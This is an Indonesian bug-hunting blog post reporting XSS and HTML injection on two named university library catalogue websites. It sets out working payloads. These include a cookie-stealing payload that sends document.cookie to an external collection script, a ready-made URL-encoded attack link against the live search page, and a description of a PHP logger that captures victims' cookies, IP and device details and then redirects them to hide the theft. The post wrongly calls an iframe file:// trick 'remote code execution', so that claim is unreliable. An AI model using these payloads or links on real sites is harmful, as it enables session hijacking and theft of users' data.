XSS Attack and html Injection on Integrated Online Public Access Catalogue UNESA

Selamunaleykum Wr.Wb

Halo, Perkenalkan Saya Sulthan Falah, Saya merupakan WEB Developer dan IT Security sejak tahun 2014, telah melakukan berbagai kegiatan pentesting, bug fixing, bug bounty, hackathon, etc. lebih dari 5000+ kasus pada website dan aplikasi. Ok Lanjut…

IOPAC UNESA Singkatnya merupakan Website milik UNIVERSITAS NEGERI SURABAYA dimana segala catatan tentang buku publikasi secara detail hingga dimana publikasi itu berada, pada kesempatan kali ini saya akan membagikan hasil temuan celah pada website IOPAC UNESA yaitu https://opac.unesa.ac.id/ dan https://iopac.unesa.ac.id/ jadi 2 Website sekaligus.

Dalam Hunting Bug kali ini saya tidak perlu memakan waktu yang sangat lama dikarenakan sangat jelas terpampang pada halaman utama kolom ‘Search’ yang begitu besar, maka pikiran saya langsung menyimpulkan kemungkinan Bug atau celah keamanan pertama yang dapat terjadi yaitu XSS (Cross Site Scripting)

Langkah pertama yang saya lakukan dalam kasus kali ini saya mencoba berbagai kemungkinan payload XSS apa saja yang dapat tereksekusi pada website IOPAC UNESA

Payload Tes:
<script>alert(1);</script> Ok

Hasil menunjukan pada 2 website tersebut Vuln terhadap XSS (Cross Site Scripting) dan HTML Injection

Setelah website diketahui benar Valid bug XSS disini saya mulai mengeksplorasi kemungkinan kemungkinan Bug XSS yang lebih variasi dan lebih dalam.

3.1 Tes REFLECTED XSS

Payload Tes :

<marquee><h1 style=”color:blue;”>Reflected+by+Blablabla</h1></marquee> Ok

Ke 2 Website IOPAC UNESA ternyata vuln terhadap reflected XSS

3.2 XSS To RCE

Payload Tes :
<div><iframe src=file:///etc/passwd></iframe></div> Ok
<img src=”Codeparty” onerror=”document.write(‘<iframe src=file:///etc/passwd></iframe>’)”/> Ok

XSS To RCE atau Remote Code Execution pada website berhasil dijalankan namun keluaran hasilan blank, disini saya berfikir 2 kemungkinan kenapa keluaran blank padahal sukses yaitu yang pertama kebelumtahuan saya terhadap path directory yang ada pada IOPAC UNESA dan yang kedua path sudah benar namun terhalang restrict dari htacces etc server.

3.3 Tes Stored XSS

Payload Tes :

<img src=”x” onerror=”document.write(window.location)” /> Ok

<img src=”x” onerror=”alert(document.cookie)”/> Ok

Dari sini saya pun mulai merasa sedikit Waahhhh karena ke 2 teknik XSS Stored Document Write dan Document Cookie dapat tereksekusi di ke 2 website tersebut, Hal ini sangat berbahaya jika attacker atau hacker lain memanfaatkan BUG XSS berikut digunakan sebagai cara untuk mencuri cookie kita, kemungkinan terburuk jika seorang attacker atau hacker dapat mencuri cookie maka dengan mudah Login atau akses pada administrator dengan tanpa login bermodalkan Cookie yang telah dicuri.

Setelah mengetahui bug stored xss berhasil menampilkan cookie disini saya akan membagikan bagaimana cara untuk memanfaatkan bug tersebut untuk mencuri cookie mirik orang lain.

Payload Tes:
<img src=”x” onerror=”document.location=’http://websitedisensor.com/api/cookies.php?c='+document.cookie;" />

Tricky Cookie Steal:

https://iopac.unesa.ac.id/cari_filter?keyword=%3Cimg+src%3D%22x%22+onerror%3D%22document.location%3D%27http%3A%2F%2Fwebsitedisensor.com%2Fapi%2Fcookies.php%3Fc%3D%27%2Bdocument.cookie%3B%22+%2F%3E&lokasi=&filter=&txfilter=

Diatas merupakan cara saya mengelabuhi dan saya mencoba tricky tap korban

4.1 Make new File PHP pada server

File yang saya buat disini bertujuan untuk menangkap informasi korban saat terkena cookie stealing namun tidak terbatas pada cookie melainkan juga informasi secara detail apasaja yang dapat kita peroleh dari korban.

Saya coba jelaskan singkat disini file cookies nanti ketika korban terkena maka script akan menangkap cookie korban dan akan disimpan pada file log.txt untuk menghindari kecurigaan korban maka saya balikan di header kehalaman utama IOPAC UNESA.

4.2 Sensitif Information

Berikut merupakan Cookie yang tertangkap setelah percobaan saya dengan bug ini, disini percobaan target saya yaitu teman saya sendiri dan gotcha tertangkap dengan sempurna.

4.3 So so Sensitif Information

Disini saya tidak menshare file php karena terlalu panjang namun saya membagikan hasil mengeksplor informasi lain yang dapat saya dapat dari korban disini saya mendapatkan IP, Port, Device, Aplikasi, Tanggal, CookiePlus dari korban. Sangat bahaya bukan ?!?!

Kesimpulan kali ini yaitu XSS Attack dan HTML Injection ini sering dianggap remeh namun developer sering lupa bahwa XSS Banyak sekali varian dalam pengaplikasiannya seperti yang saya lakukan kali ini, sehingga bug ini dapat dikategorikan sebagai Bug yang Berbahaya